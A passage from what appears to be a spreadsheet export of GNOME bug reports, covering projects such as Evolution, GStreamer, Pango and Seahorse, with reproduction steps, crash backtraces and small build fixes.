casting pad-&gt;serialno to long int fix the warning. Or changing lx to dx.</t>
  </si>
  <si>
    <t>VINO-331700</t>
  </si>
  <si>
    <t>Preferences Dialog</t>
  </si>
  <si>
    <t>VINO</t>
  </si>
  <si>
    <t>Weird i18n strings</t>
  </si>
  <si>
    <t>Here are some strings marked for i18n that should not be 
#: ../capplet/vino-preferences.glade.h:1
msgid     
msgstr     
#: ../capplet/vino-preferences.glade.h:2
msgid         
msgstr         
#: ../capplet/vino-preferences.glade.h:3
msgid *
msgstr *
Thanks.</t>
  </si>
  <si>
    <t>vino-maint</t>
  </si>
  <si>
    <t>bdejean</t>
  </si>
  <si>
    <t>GSTREAMER-523134</t>
  </si>
  <si>
    <t>osxvideosink does not stop when you control-C</t>
  </si>
  <si>
    <t>Steps to reproduce:
 1. run gst-launch videotestsrc ! osxvideosink
 2. press Control-C
Expected behaviour:
 * the pipeline stops properly
Actual behaviour:
 * The pipeline just keeps on a'chuggin along
 * Also menus and the window are not responsive: when you mouseover a menu or the video window we get the delightful spinning beach ball effect.
I am on OSX 10.5.</t>
  </si>
  <si>
    <t>FILE-ROLLER-131254</t>
  </si>
  <si>
    <t>FILE-ROLLER</t>
  </si>
  <si>
    <t>[UI-REVIEW] Preferences Dialog</t>
  </si>
  <si>
    <t>I'll be attaching the IRC Log of the conversation about the Preferences Dialog.
General Summary -
    Always use a medium level compression and remove the option from pref
    Remove options for visible columns
    Remove Preferences Dialog since there are no more options
    Remove Preferences menu item from the Edit menu</t>
  </si>
  <si>
    <t>clarkbw</t>
  </si>
  <si>
    <t>FOLKS-677854</t>
  </si>
  <si>
    <t>FOLKS</t>
  </si>
  <si>
    <t>im-interaction-count is not updated when reconnecting</t>
  </si>
  <si>
    <t>Created attachment 216106
test app
- Make sure your IM accounts are online
- Build and start the attached test app
- You should see a bunch of CHANGED ... individuals having a not 0 count.
- Disconnect your IM accounts (let the test app running)
- All individuals are removed
- Reconnect your IM accounts
- Individuals are re-added but their count is not updated.</t>
  </si>
  <si>
    <t>folks-maint</t>
  </si>
  <si>
    <t>gdesmott</t>
  </si>
  <si>
    <t>GNOME-PANEL-73547</t>
  </si>
  <si>
    <t>Clock applet - Disabling tooltip has problem</t>
  </si>
  <si>
    <t>In the clock applet properties dialog there is an option for enabling
and disabling  tooltip. The problem  is that disabling of tooltip
doesn't have immediate reflection.
But if you kill the panel (without removing the clock applet) and on
restarting the changes get reflected.</t>
  </si>
  <si>
    <t>jayaraj.rajappan</t>
  </si>
  <si>
    <t>GOK-159332</t>
  </si>
  <si>
    <t>GOK</t>
  </si>
  <si>
    <t>GOK can't work with Mozilla correctly.</t>
  </si>
  <si>
    <t>Bugster Bug #6199099
This is a regression bug in cinnabar23.
Steps to Reproduce:
1. Start GOK and Mozilla.
2. In GOK activate Mozilla.
3. In GOK click Menus/Toolbar/UI Grab
Bug Observation:
When clicked on GOK Menus button GOK has two buttons: Back and Stop. 
When clicked on GOK Toolbars or UI Grab GOK contains all the menu items and
their sub menus. 
I attached a snapshot showing what the bug looks like.
Evaluation
This was introduced by the fix for bug #157420.  A four-line fix is available.
bill.haneman@sun.com 2004-11-23 14:04:23 GMT
This is a P1 regression therefore I think it merits STP.
bill.haneman@sun.com 2004-11-23 14:05:08 GMT
Comments
GOK works with Evolution correctly in Cinnabar23/sparc. I will try to use the
old GOK builds to see what it is.
jessie.li@sun.com 2004-11-23 03:16:27 GMT
This is another case of regression caused by GOK's change. Mozilla (both b22 and
b23)works find with GOK 0.11.14 (build22) but has problem with GOK 0.11.16
(build23).
louie.zhao@sun.com 2004-11-23 05:38:02 GMT
jessie.li@sun.com 2004-11-23 05:53:09 GMT
RE conversation w/R O'Dea approval not required for putback to this unsupported
component provided I make the committment to ensure it's integrated and tested
in a nightly build prior to b24.  I am doing that now and will pull the fix if
there's a problem.
bill.haneman@sun.com 2004-11-23 14:09:48 GMT</t>
  </si>
  <si>
    <t>david.bolter</t>
  </si>
  <si>
    <t>frances.keenan</t>
  </si>
  <si>
    <t>PANGO-100307</t>
  </si>
  <si>
    <t>pango fails to render characters which are beyond Unicode BMP</t>
  </si>
  <si>
    <t>In Unicode 3.2 most of CJK extension B characters are assigned in its
Supplementary Ideographs characters. But in pango only 65536 number of
PangoSubmaps are assigned to store PangoEngineInfo for characters within
Unicode BMP this wrong assumption prevents from these characters beyond
Unicode BMP being rendered in pango. A sample patch is able to fix it.</t>
  </si>
  <si>
    <t>federic.zhang</t>
  </si>
  <si>
    <t>BONOBO-125756</t>
  </si>
  <si>
    <t>configure.in problem with $PKG_CONFIG</t>
  </si>
  <si>
    <t>running './autogen.sh' on libbonoboui from cvs gives the error message:
checking for catalogs to be installed...  am ar az be bg bn ca cs cy da de
el es fa fi fr he hi hu id is it ja kn ko li lt lv
ml mn mr ms ne nl nn no pl pt pt_BR ro ru sk sl sq sr sr@Latn sv ta tr uk
vi wa yi zh_CN zh_TW
./configure: line 21136: --exists: command not found
./configure: line 1: --libs: command not found
The problem is with these lines from configure.in:
if $PKG_CONFIG --exists pangoxft  then
  PANGO_PACKAGES=pangox pangoxft
else
  PANGO_PACKAGES=pangox
fi
Which use $PKG_CONFIG before initializing it or checking that it exists.
This can be fixed by placing the following lines above the first use of
$PKG_CONFIG:
AC_PATH_PROG([PKG_CONFIG] [pkg-config] [no])
if test x$PKG_CONFIG = xno then
  AC_MSG_ERROR([Couldn't find pkg-config please install it and retry])
fi</t>
  </si>
  <si>
    <t>im91odnmgs</t>
  </si>
  <si>
    <t>EVOLUTION-209254</t>
  </si>
  <si>
    <t>Composer misses Help button in menu</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Wishlist
Version: 0.13.99
Synopsis: New Message dialog needs Help button in menu
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I was tinkering with the possibilities of layout in the New Message
dialog. Instead of just playing with it I suddenly wanted to read about
my possibilities. Then I had to realise that there is no way of getting
help from within the New Message dialog.
My suggestion for a solution would be twofold:
1) Add the button right away. Just let it open the general evolution
mail help.
2) When there the helptext specific to the New Message dialog is
ready let the help button link to that (so that it's more context
sensitive).
Unknown reporter: ligaard@trillegaarden.dk changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>ligaard</t>
  </si>
  <si>
    <t>SHOTWELL-715440</t>
  </si>
  <si>
    <t>SHOTWELL</t>
  </si>
  <si>
    <t>adjust Help-&gt;Contents URL</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by adam@yorba.org 2009-06-22 11:15:00 -0700 ----
Original Redmine bug id: 388
Original URL: http://redmine.yorba.org/issues/388
Searchable id: yorba-bug-388
Original author: Adam Dingle
Original description:
We will quite possibly move Trac from port 8000 to port 80 for the upcoming
release (see #385). If we do so we'll need to adjust the Help-&gt;Contents
destination URL.
---- Additional Comments From shotwell-maint@gnome.bugs 2013-05-01 11:42:00 -0700 ----
### History
####
#1
Updated by Jim Nelson over 4 years ago
  * **Status** changed from _Open_ to _5_
  * **Resolution** set to _fixed_
  * **% Done** set to _100_
####
#2
Updated by Charles Lindsay 7 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-25 21:41 UTC  ---
This bug was previously known as _bug_ 388 at http://redmine.yorba.org/show_bug.cgi?id=388
Unknown Component 
   Using default product and component set in Parameters 
Unknown version  in product shotwell. 
   Setting version to !unspecified.
Unknown milestone unknown in product shotwell. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>shotwell-maint</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-329373</t>
  </si>
  <si>
    <t>configure ignores PYTHONPATH set in environment</t>
  </si>
  <si>
    <t>configure ignores PYTHONPATH if it is set in the environment. If the user has set PYTHONPATH configure should respect the user's wishes.
This causes problems with build frameworks like GARNOME that install all files under a separate install tree to avoid overwriting system installed files.
configure fails to detect the presence of gnomeapplet which is installed under
     $pythondir/gtk-2.0
The existing code will set
     PYTHONPATH = $pythondir
which under GARNOME is
     $garnome/lib/python-2.4/site-pacakges
configure needs to add
     $pythondir/gtk-2.0
to PYTHONPATH.
-Joseph</t>
  </si>
  <si>
    <t>EVOLUTION-203758</t>
  </si>
  <si>
    <t>Clicking on the online/offline button crashed Evolution.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.10.99
Synopsis: Clicking on the online/offline bug crashed Evolution.
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
I know nothing else.
Debugging Information:
[New Thread 1024 (LWP 7409)]
0x408ec869 in __wait4 () from /lib/libc.so.6
#0  0x408ec869 in __wait4 () from /lib/libc.so.6
#1  0x409581c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4067a70a in waitpid (pid=21572 stat_loc=0xbfffe068 options=0)
    at wrapsyscall.c:174
#3  0x402bf2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x40678329 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 56341 
      esi = 135839224 ebp = 3221218336 esp = 3221218312 ebx = 1079012344 
      edx = 0 ecx = 134630888 eax = 1852795252 trapno = 14 err = 4 
      eip = 1078713672 cs = 35 __csh = 0 eflags = 2163206 
      esp_at_signal = 3221218312 ss = 43 __ssh = 0 fpstate = 0xbfffe188 
      oldmask = 2147483648 cr2 = 1852795252}) at signals.c:97
#5  
#6  gtk_type_check_object_cast (type_object=0x818bdf8 cast_type=56341)
    at gtktypeutils.c:633
#7  0x8064e0c in shell_line_status_changed_cb (shell=0x80da130 
    new_status=E_SHELL_LINE_STATUS_GOING_OFFLINE data=0x818bdf8)
    at e-shell-view-menu.c:697
#8  0x40467979 in gtk_marshal_NONE__INT (object=0x80da130 
    func=0x8064de8  func_data=0x818bdf8 
    args=0xbfffe538) at gtkmarshal.c:240
#9  0x404970d6 in gtk_handlers_run (handlers=0x81ade58 signal=0xbfffe4d8 
    object=0x80da130 params=0xbfffe538 after=0) at gtksignal.c:1917
#10 0x40496537 in gtk_signal_real_emit (object=0x80da130 signal_id=66 
    params=0xbfffe538) at gtksignal.c:1477
#11 0x404945ac in gtk_signal_emit (object=0x80da130 signal_id=66)
    at gtksignal.c:552
#12 0x806da92 in offline_procedure_started_cb (offline_handler=0x818b808 
    data=0x80da130) at e-shell.c:1280
#13 0x40467a03 in gtk_marshal_NONE__NONE (object=0x818b808 
    func=0x806da00  func_data=0x80da130 
    args=0xbfffe8f8) at gtkmarshal.c:312
#14 0x404970d6 in gtk_handlers_run (handlers=0x831a970 signal=0xbfffe898 
    object=0x818b808 params=0xbfffe8f8 after=0) at gtksignal.c:1917
#15 0x40496537 in gtk_signal_real_emit (object=0x818b808 signal_id=224 
    params=0xbfffe8f8) at gtksignal.c:1477
#16 0x404945ac in gtk_signal_emit (object=0x818b808 signal_id=224)
    at gtksignal.c:552
#17 0x8063dbe in e_shell_offline_handler_put_components_offline (
    offline_handler=0x818b808 parent_shell_view=0x8115990)
    at e-shell-offline-handler.c:793
#18 0x806dede in e_shell_go_offline (shell=0x80da130 action_view=0x8115990)
    at e-shell.c:1354
#19 0x8065e94 in offline_toggle_clicked_cb (button=0x81108b0 data=0x8115990)
    at e-shell-view.c:563
#20 0x40467a03 in gtk_marshal_NONE__NONE (object=0x81108b0 
    func=0x8065e30  func_data=0x8115990 
    args=0xbfffed18) at gtkmarshal.c:312
#21 0x404970d6 in gtk_handlers_run (handlers=0x8114120 signal=0xbfffecb8 
    object=0x81108b0 params=0xbfffed18 after=0) at gtksignal.c:1917
#22 0x40496537 in gtk_signal_real_emit (object=0x81108b0 signal_id=119 
    params=0xbfffed18) at gtksignal.c:1477
#23 0x404945ac in gtk_signal_emit (object=0x81108b0 signal_id=119)
    at gtksignal.c:552
#24 0x40405568 in gtk_button_clicked (button=0x81108b0) at gtkbutton.c:336
#25 0x40406ae2 in gtk_real_button_released (button=0x81108b0)
    at gtkbutton.c:861
#26 0x40467a03 in gtk_marshal_NONE__NONE (object=0x81108b0 
    func=0x40406a3c  func_data=0x0 args=0xbffff0a8)
    at gtkmarshal.c:312
#27 0x404963e3 in gtk_signal_real_emit (object=0x81108b0 signal_id=118 
    params=0xbffff0a8) at gtksignal.c:1440
#28 0x404945ac in gtk_signal_emit (object=0x81108b0 signal_id=118)
    at gtksignal.c:552
#29 0x404054ac in gtk_button_released (button=0x81108b0) at gtkbutton.c:327
#30 0x40406457 in gtk_button_button_release (widget=0x81108b0 event=0x80e3618)
    at gtkbutton.c:721
#31 0x404677d9 in gtk_marshal_BOOL__POINTER (object=0x81108b0 
    func=0x40406394  func_data=0x0 
    args=0xbffff448) at gtkmarshal.c:28
#32 0x40496577 in gtk_signal_real_emit (object=0x81108b0 signal_id=31 
    params=0xbffff448) at gtksignal.c:1492
#33 0x404945ac in gtk_signal_emit (object=0x81108b0 signal_id=31)
    at gtksignal.c:552
#34 0x404cb978 in gtk_widget_event (widget=0x81108b0 event=0x80e3618)
    at gtkwidget.c:2864
#35 0x40467750 in gtk_propagate_event (widget=0x81108b0 event=0x80e3618)
    at gtkmain.c:1378
#36 0x4046690d in gtk_main_do_event (event=0x80e3618) at gtkmain.c:818
#37 0x4052112b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff818 user_data=0x0) at gdkevents.c:2139
#38 0x40551055 in g_main_dispatch (dispatch_time=0xbffff818) at gmain.c:656
#39 0x40551659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#40 0x405517e8 in g_main_run (loop=0x80d6450) at gmain.c:935
#41 0x40466213 in gtk_main () at gtkmain.c:524
#42 0x407363af in bonobo_main () at bonobo-main.c:277
#43 0x807c1b3 in main (argc=1 argv=0xbffff9ac) at main.c:231
#44 0x40857b5c in __libc_start_main (main=0x807bfd4  argc=1 
    ubp_av=0xbffff9ac init=0x8052654  fini=0x807dbbc  
    rtld_fini=0x4000d634  stack_end=0xbffff9a4)
    at ../sysdeps/generic/libc-start.c:129
#0  0x408ec869 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x409581c8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4067a70a in waitpid (pid=21572 stat_loc=0xbfffe068 options=0)
    at wrapsyscall.c:174
stat_loc = (int *) 0xbfffe068
options = 0
result = 0
oldtype = 0
#3  0x402bf2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1083539912
in_segv = 1
pid = 0
#4  0x40678329 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 56341 
      esi = 135839224 ebp = 3221218336 esp = 3221218312 ebx = 1079012344 
      edx = 0 ecx = 134630888 eax = 1852795252 trapno = 14 err = 4 
      eip = 1078713672 cs = 35 __csh = 0 eflags = 2163206 
      esp_at_signal = 3221218312 ss = 43 __ssh = 0 fpstate = 0xbfffe188 
      oldmask = 2147483648 cr2 = 1852795252}) at signals.c:97
self = 0x40681280
in_sighandler = 0x0
self = 0x40681280
in_sighandler = 0x0
#5  
No locals.
#6  gtk_type_check_object_cast (type_object=0x818bdf8 cast_type=56341)
    at gtktypeutils.c:633
type_object = (GtkTypeObject *) 0x818bdf8
cast_type = 56341
name = (gchar *) 0xfffffe00 
#7  0x8064e0c in shell_line_status_changed_cb (shell=0x80da130 
    new_status=E_SHELL_LINE_STATUS_GOING_OFFLINE data=0x818bdf8)
    at e-shell-view-menu.c:697
697	{
shell_view = (EShellView *) 0x8115990
Reassigning to the default owner of the component ettore@ximian.com.
</t>
  </si>
  <si>
    <t>nat</t>
  </si>
  <si>
    <t>EVOLUTION-216451</t>
  </si>
  <si>
    <t>Allow users to set order of POP and SMTP for authentication reasons</t>
  </si>
  <si>
    <t>A user writes in:
my current provider uses pop after smtp authentication. so when i
write emails and the time span has run out i have to hit send/receive
twice to get everything sent. A checkbox in the account options would be
nice for this so sending could be done _after_ receiving from the
account and not simultaniously.</t>
  </si>
  <si>
    <t>GTKHTML-211858</t>
  </si>
  <si>
    <t>Editing</t>
  </si>
  <si>
    <t>typing EURO sign weirdness</t>
  </si>
  <si>
    <t>Ok this is the deal:
I did *not* enable the EURO sign (Â¤) on my keyboard with xmodmap (which I
would do by putting keycode  26 = e E currency EuroSign in a file and
then loading it with xmodmap)
So first I can type the Â¤ sign wonderfully in a message composition window
- in the To CC and Subject field. Works great. I can send Â¤@mydomain.de a
mail. very useful .
Anyway I typed a subject such as going to test this with 100Â¤
works great.
Now I went on to type something in the body - and what happens? I get e
in the subject field! I don't get a Â¤ sign in the body in fact I get
nothing in the body I get a lowercase e in the subject.
Ok well I figured since I don't have the EURO symbol enabled in X I should
better enable it. Did that and now I can no longer type the Â¤ symbol in the
To CC or subject fields I always get a small symbol (no character or
something) which seems to be unicode since copy/pasting it here yields
Ã‚Â¤. Now there's an EURO sign. Weirdness.
Well the same thing happens in the body - in the body I can now hit the
AltGr-E key sequence but it only yields a symbol (copied here Â¤) and no
EURO sign.
One more thing I had enabled ISO-8859-15 as my default charset and
selected all ISO-8859-15 fonts in my preferences for the HTML viewer
component in the control center.</t>
  </si>
  <si>
    <t>GTK+-64154</t>
  </si>
  <si>
    <t>misprint in docs for gtk_combo_disable_activate ()</t>
  </si>
  <si>
    <t>Documentation for gtk_combo_disable_activate () says:
... This may be useful if for example. you want the Return key to close a
dialog instead.
The dot after 'example' should be a comma.</t>
  </si>
  <si>
    <t>EKIGA-501909</t>
  </si>
  <si>
    <t>Message Waiting Indicator status incorrect</t>
  </si>
  <si>
    <t>Please describe the problem:
Ekiga receives an unsolicited NOTIFY from voicemail with Messages=No but continues to report New Voicemail in the gui. This is again Cisco Call Manager 5.1.2 and Cisco Unity Connection 1.2 which are integrated via SIP.
Steps to reproduce:
1. Leave a voicemail for Ekiga user.
2. Have user check review and delete all voicemail messages.
3. Observe Voice Mails indicator in Ekiga.
Actual results:
Ekiga continues to report new Voice Mails even though there are no voicemails for user.
Expected results:
Ekiga should report Voice Mails: 0.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>ekiga-maint</t>
  </si>
  <si>
    <t>jmiccich</t>
  </si>
  <si>
    <t>GPARTED-301831</t>
  </si>
  <si>
    <t>Button is inaccessible during partioning/formatting</t>
  </si>
  <si>
    <t>Distribution/Version: Fedora Core/3
It doesn't seem to matter what I do just as long as it gives parted some work
to do that takes a while.  The longer the working time the more likely you are
to see what I snapped a screenshot of (it's attached to this bug).</t>
  </si>
  <si>
    <t>jbn+gnome</t>
  </si>
  <si>
    <t>ORCA-664384</t>
  </si>
  <si>
    <t>ORCA</t>
  </si>
  <si>
    <t>Need to move getLinkBasename() functionality out of Gecko script so all scripts can use it</t>
  </si>
  <si>
    <t>Orca's Gecko script has a getLinkBasename() method which is designed to find *something* meaningful given a URI. This is especially needed for image links and image maps that are not properly marked up to be accessible.
Other scripts (such as Orca's WebKitGtk script) need this functionality.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-319634</t>
  </si>
  <si>
    <t>support show_input_method_menu gconf key</t>
  </si>
  <si>
    <t>In 2.10 GTK+ will support XSettings to control the visibility of the 
input method and Unicode control character submenus in the context menus 
of entries and text views. 
The following patch adds support for these to gnome-settings-daemon</t>
  </si>
  <si>
    <t>PAN-339467</t>
  </si>
  <si>
    <t>crash because I don't know that header!</t>
  </si>
  <si>
    <t>Pan consistently crashes after or while retrieving the headers in one (internal to my ISP) newsgroup.  The end of the --debug log looks like this:
----------------------------------------------------------------------------
(socket-impl-gio.cc:247:do_read) read [224 Overview Information Follows
]
(socket-impl-gio.cc:381:set_watch_mode) socket 0x8b4dfe8 calling set_watch_mode 1 _channel is 0x8b525c8
(socket-impl-gio.cc:404:set_watch_mode) channel 0x8b525c8 setting mode read later
(socket-impl-gio.cc:415:set_watch_mode) set_watch_mode 1: _tag_watch is now 85
(socket-impl-gio.cc:270:do_read) channel 0x8b525c8 done reading
(socket-impl-gio.cc:356:gio_func) gio_func exit 0x8b4dfe8 with retval 0
(socket-impl-gio.cc:364:read_later) socket 0x8b4dfe8 done sleeping setting watch mode to read
(socket-impl-gio.cc:381:set_watch_mode) socket 0x8b4dfe8 calling set_watch_mode 0 _channel is 0x8b525c8
(socket-impl-gio.cc:398:set_watch_mode) channel 0x8b525c8 setting mode read
(socket-impl-gio.cc:415:set_watch_mode) set_watch_mode 0: _tag_watch is now 89
(socket-impl-gio.cc:332:gio_func) gio_func: socket 0x8b4dfe8 channel 0x8b525c8 cond 1
(socket-impl-gio.cc:247:do_read) read [144703   Re: wat nu weer?        ZigZag    Wed 15 Feb 2006 18:29:54 +0100     1516    23      Xref: kwabbernoot.telenet-ops.be pandora.pub:144703
]
pan: article-filter.cc:47: pan::StringView::get_header(const pan::Article&amp; const pan::Quark&amp;): Assertion `0 &amp;&amp; I don't know that header!' failed.
----------------------------------------------------------------------------
PS: there are no 0.9x versions available in the bug entry form...?</t>
  </si>
  <si>
    <t>devel+gnome</t>
  </si>
  <si>
    <t>EVOLUTION-311778</t>
  </si>
  <si>
    <t>Account Configuration: The real name of the user is not automatically detected in account setup druid</t>
  </si>
  <si>
    <t>Please describe the problem:
When we run the account setup druid the real name of the user is not
automatically detected and filled up against the full name text entry. It used
to work fine with Evolution 2.2
Steps to reproduce:
Add a new account through the druid
Actual results:
The real name of the user is not automatically detected
Expected results:
It should be automatically detected and filled up against the full name
Does this happen every time?
Always
Other information:</t>
  </si>
  <si>
    <t>kpraveen</t>
  </si>
  <si>
    <t>EVOLUTION-330650</t>
  </si>
  <si>
    <t>Filters dialog title should be Message Filters</t>
  </si>
  <si>
    <t>The Filters dialog accessed via Edit -&gt; Message Filters should have a the title Message Filters as recommended by the HIG.
http://developer.gnome.org/projects/gup/hig/2.0/windows-dialog.html
Title Format: Name of command that opened the dialog  (without any trailing ellipsis)</t>
  </si>
  <si>
    <t>BANSHEE-351004</t>
  </si>
  <si>
    <t>Device - iPod</t>
  </si>
  <si>
    <t>It is possible to add files to the iPod multiple times</t>
  </si>
  <si>
    <t>Please describe the problem:
When adding files to your iPod it appears there is no check to see if the file is already there.
Steps to reproduce:
1. Plug in an iPod.
2. Drag some files to it.
3. Drag the same files on to it again.
Actual results:
The number of songs on the iPod increases the second time you drag and if you click on the iPod you can see that the same songs are indeed there twice.
Expected results:
The number of songs should remain the same the second time you drag and if you click on the iPod you should not see duplicates.
Does this happen every time?
Yes.
Other information:
This is 0.10.11 (I could not choose that version in Bugzilla).</t>
  </si>
  <si>
    <t>pcolijn</t>
  </si>
  <si>
    <t>GSTREAMER-329075</t>
  </si>
  <si>
    <t>__gsignals__ doesn' t work in classes derived from gst.Pipeline</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi!
I was trying to use the __gsignals__ class attribute to define some signals of
my own in a Python class derived from gst.Pipeline but connecting or emitting
the signal fails with an 'unknown signal' error. Using __gsignals__ with classes
derived directly from gobject.GObject or say from one of the GTK classes
works properly.
Steps to reproduce:
1. Run the attached pygst-signals.py
Actual results:
This is the output I get from pygst-signals.py:
masoft:~/Desktop/Projects/seamless-devel$ python pygst-gsignals.py
Signal emitted on object '&lt;MyGObject object (__main__+MyGObject) at
0xb70295f4&gt;'Signal emitted on object '&lt;MyLabel object (__main__+MyLabel) at
0xb702961c&gt;'
Traceback (most recent call last):
  File pygst-gsignals.py line 54 in ?
    p.connect('my-signal' handler)
TypeError: : unknown signal name:
my-signal
Expected results:
I would expect the exception at the end not to happen.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>soto</t>
  </si>
  <si>
    <t>SEAHORSE-413665</t>
  </si>
  <si>
    <t>crash in Passwords and Encryption Keys: fechando a aplicaÃ§Ã£o</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
fechando a aplicaÃ§Ã£o
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 149958656 vsize: 149958656 resident: 21147648 share: 13017088 rss: 21147648 rss_rlim: -1
CPU usage: start_time: 1172792101 rtime: 219 utime: 199 stime: 20 cutime:3 cstime: 2 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/seahorse'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 47445151694800 (LWP 18465)]
(no debugging symbols found)
0x00002b26ad9eaeb5 in waitpid () from /lib/libpthread.so.0
#0  0x00002b26ad9eaeb5 in waitpid () from /lib/libpthread.so.0
#1  0x00002b26a99f6a07 in gnome_gtk_module_info_get ()
   from /usr/lib64/libgnomeui-2.so.0
#2  
#3  0x00002b26adb2547b in raise () from /lib/libc.so.6
#4  0x00002b26adb26da0 in abort () from /lib/libc.so.6
#5  0x00002b26ad874d70 in g_logv () from /usr/lib64/libglib-2.0.so.0
#6  0x00002b26ad874df3 in g_log () from /usr/lib64/libglib-2.0.so.0
#7  0x00002b26ad874e76 in g_assert_warning () from /usr/lib64/libglib-2.0.so.0
#8  0x00002b26afc3b19a in gail_tree_view_new ()
   from /usr/lib/gtk-2.0/modules/libgail.so
#9  0x00002b26afc3c0a3 in gail_tree_view_new ()
   from /usr/lib/gtk-2.0/modules/libgail.so
#10 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#11 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#12 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#13 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#14 0x00002b26abcc1b86 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#15 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#16 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#17 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#18 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#19 0x00002b26abcbd6b2 in gtk_tree_model_filter_convert_child_iter_to_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#20 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#21 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#22 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#23 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#24 0x00002b26abcc944e in gtk_tree_store_append ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#25 0x00000000004151ca in ?? ()
#26 0x00000000004152ce in ?? ()
#27 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#28 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#29 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#30 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#31 0x0000000000434c83 in ?? ()
#32 0x0000000000434dbb in ?? ()
#33 0x0000000000417b40 in ?? ()
#34 0x00000000004185df in ?? ()
#35 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#36 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#37 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#38 0x00002b26ad3e1003 in g_signal_emit_by_name ()
   from /usr/lib64/libgobject-2.0.so.0
#39 0x00002b26abccd12f in _gtk_tree_view_find_node ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#40 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#41 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#42 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#43 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#44 0x00002b26abcc1e57 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#45 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#46 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#47 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#48 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#49 0x00002b26abcbebc0 in gtk_tree_model_filter_convert_child_iter_to_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#50 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#51 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#52 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#53 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#54 0x00002b26abcc8674 in gtk_tree_store_remove ()
